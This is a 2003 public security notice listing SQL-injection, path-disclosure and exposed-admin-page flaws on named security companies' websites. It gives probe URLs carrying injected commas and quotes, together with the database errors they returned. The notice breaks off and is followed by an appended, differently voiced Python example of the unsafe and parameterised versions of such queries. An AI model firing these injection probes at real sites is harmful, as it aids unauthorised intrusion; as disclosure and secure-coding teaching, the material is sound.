From: mordred at s-mail.com (Sir Mordred)
Subject: @(#)Mordred Labs security notice - exploring the security companies

// @(#)Mordred Labs security notice 0x0002

Name: Exploring the security companies (part one)
Release date: May 7, 2003
Author: Sir Mordred (mordred@...ail.com)

I. INTRODUCTION

This is the first part of a security notice about security companies.
I split the original notice because of the amount of information contained
in it.
The main topic of this notice is "bad coding habits"; next time maybe we
will talk about security audit, and source code audit in particular.

Also I should say - somehow I feel respect for people who are doing
security and are brave enough to build a website with dynamic content,
not just a couple of HTML pages.
But sometimes a crazy thought crosses my mind - maybe it is just a dumb
honeypot? :-)

The format for vulnerabilities is:

<number>) [hostname, the company name]
quotes, comments (if any)
* ISSUE <number> - description of the vulnerability
blank line
comments (if any)
blank line
the URL to demonstrate this vulnerability
blank line
the error message (if any)

II. DETAILS

Now let's begin with the rather interesting security company "e-matters";
a couple of minutes brings us several nice issues:

1) [ www.e-matters.de, e-matters ]

Though I do not understand German :-) it was very exciting to visit the
e-matters website.
I thought - well, there is Stefan Esser out there, respected security
expert and PHP developer; now I am gonna actually visit his company's
website, and if I am lucky enough and the website has some dynamic content
I may find something very interesting ... I will be changing URL parameters,
putting in single quotes, commas and all such shit ... :-)

Then I got interested in their flagship product, Webmail 3.0, as it has a
demo account, and this brings us to Issue 4.

Well, it was real fun I should say. Have you ever seen a broken test.php
page?
I hadn't.

How about the customers.html page?
I think if I were going to buy some e-matters products, I'd run away from
this site:

* ISSUE 1 - /customers.html page is broken

Somehow this page is very broken, and when you visit
http://www.e-matters.de/customers.html
you can see something like this:

Warning:  mysql_pconnect(): Access denied for user: 'root@...alhost' (Using
password: YES) in /domains/e-matters.de/ftp/html/customers.html on line 17
Warning:  mysql_select_db(): supplied argument is not a valid MySQL-Link
resource in /domains/e-matters.de/ftp/html/customers.html on line 18
Warning:  mysql_query(): supplied argument is not a valid MySQL-Link
resource in /domains/e-matters.de/ftp/html/customers.html on line 20
Warning:  mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /domains/e-matters.de/ftp/html/customers.html on line 21
Warning:  mysql_fetch_array(): supplied argument is not a valid MySQL
result resource in /domains/e-matters.de/ftp/html/customers.html on line 34

* ISSUE 2 - Path disclosure in /screenshotPopUp.html

http://www.e-matters.de/screenshotPopUp.html?INC=w&ID=1&

Warning:  main(./screenshots/wwebmail.inc.php): failed to open stream: No
such file or directory in
/domains/e-matters.de/ftp/html/screenshotPopUp.html on line 15
Warning:  main(): Failed opening './screenshots/w.inc.php' for inclusion
(include_path='.:/usr/local/lib/php') in
/domains/e-matters.de/ftp/html/screenshotPopUp.html on line 15

* ISSUE 3 - Path disclosure in /test.php page

http://webmail.e-matters.de/test.php

Parse error: parse error in /domains/e-matters.de/ftp/html/webmail/test.php
on line 4

* ISSUE 4 - Admin access to webmail.e-matters.de interface

The url http://webmail.e-matters.de/admin/ will happily display all users
along with their passwords.

2) [ www.ca.com, Computer Associates ]
<quote>
CA is a $3 billion revenue enterprise software company, providing
business-critical technology that serves as the backbone of commerce and
shapes the way business is conducted throughout the world.
</quote>

* ISSUE 1 - SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1,'1&SOL=1&AR=&CP=

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near ','.
/common/include/caADO.asp, line 243

* ISSUE 2 - Another SQL injection in /qoutes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1,1&AR=&CP=

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near '1'.
/common/include/caADO.asp, line 243

* ISSUE 3 - Another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR=&CP=,'

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ','.
/common/include/caADO.asp, line 243

* ISSUE 4 - Yet another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR='88&CP=20099

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '88)) AND q.FKComp_ID =
20099 ORDER BY co.Comp_Name, Quotes_Date DESC'.
/common/include/caADO.asp, line 243

3) [ www.netegrity.com, Netegrity Inc. ]
<quote>
Netegrity, Inc. is a leading provider of security software solutions that
securely manage identities and their access to enterprise information
assets, letting business in while keeping risk out.
Netegrity provides a comprehensive identity and access management product
line for continuously evolving computing environments, including legacy,
Web, and service-oriented architectures.
</quote>

* ISSUE 1 - SQL injection in /News/feature.cfm page

http://www.netegrity.com/News/feature.cfm?ArticleID=1,

ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax
near ','.
The error occurred while processing an element with a general identifier of
(CFQUERY), occupying document position (24:1) to (24:55).

* ISSUE 2 - SQL injection in /News/PressRelease.cfm page

http://www.netegrity.com/News/PressRelease.cfm?ArticleId=1,1&leveltwo=PressReleases

ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 6: Incorrect syntax
near ','.
The error occurred while processing an element with a general identifier of
(CFQUERY), occupying document position (24:1) to (24:55).

* ISSUE 3 - Path disclosure

http://www.netegrity.com/News/PressRelease_Archive.cfm?levelthree=2000&release=nul

Cannot open CFML file
The requested file "C:\INETPUB\WWWROOT\2001\NEWS\ARCHIVE\DOM\2000\NUL.HTML"
cannot be found.
The specific sequence of files included or processed is:
C:\INETPUB\WWWROOT\2001\NEWS\PRESSRELEASE_ARCHIVE.CFM 
C:\INETPUB\WWWROOT\2001\NEWS\ARCHIVE\DOM\2000\NUL.HTML  CFInclude

The error occurred while processing an element with a general identifier of
(CFINCLUDE), occupying document position (44:2) to (44:32).
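The SQL errors in the CA and Netegrity issues and the PHP warnings in the e-matters issues come from the same coding habit: a request parameter pasted straight into a query or include string, with the raw engine error sent back to the browser. The following is an added example, not code from this notice or from any of the companies named; it uses Python with an in-memory sqlite3 table (constructed sample rows) as a stand-in for the ASP and ColdFusion article lookups, and shows the concatenating lookup beside a validated, bound one plus an error handler that keeps paths and query text out of the response.

```python
# Added example: concatenated SQL (the habit behind the "Incorrect syntax
# near ','" errors above) beside a validated, parameterised lookup, and a
# response handler that logs detail server-side but returns nothing internal.
import logging
import sqlite3

log = logging.getLogger("articles")


def make_db():
    """In-memory stand-in for the articles table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(1, "First article"), (2, "Second article")])
    return db


def feature_unsafe(db, article_id):
    """Vulnerable pattern: the request parameter becomes part of the SQL text,
    so an ArticleID of "1," reaches the engine as a syntax error."""
    sql = "SELECT title FROM articles WHERE id = " + article_id
    return db.execute(sql).fetchone()


def feature_safe(db, article_id):
    """Hardened: reject anything that is not an integer, then bind the value;
    the parameter can never change the shape of the statement."""
    if not article_id.isdigit():
        raise ValueError("ArticleID must be a positive integer")
    return db.execute("SELECT title FROM articles WHERE id = ?",
                      (int(article_id),)).fetchone()


def handle_request(db, article_id, handler):
    """What the client sees: the title, 'not found', or a generic error.
    Engine messages (driver name, file path, query fragment) stay in the log."""
    try:
        row = handler(db, article_id)
        return ("200", row[0] if row else "not found")
    except (sqlite3.Error, ValueError) as exc:
        log.error("article lookup failed for %r: %s", article_id, exc)
        return ("400", "Bad request")
```

With display of engine errors off, a malformed ArticleID yields the same generic reply whichever lookup handles it; only the bound version also removes the underlying bug.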
  




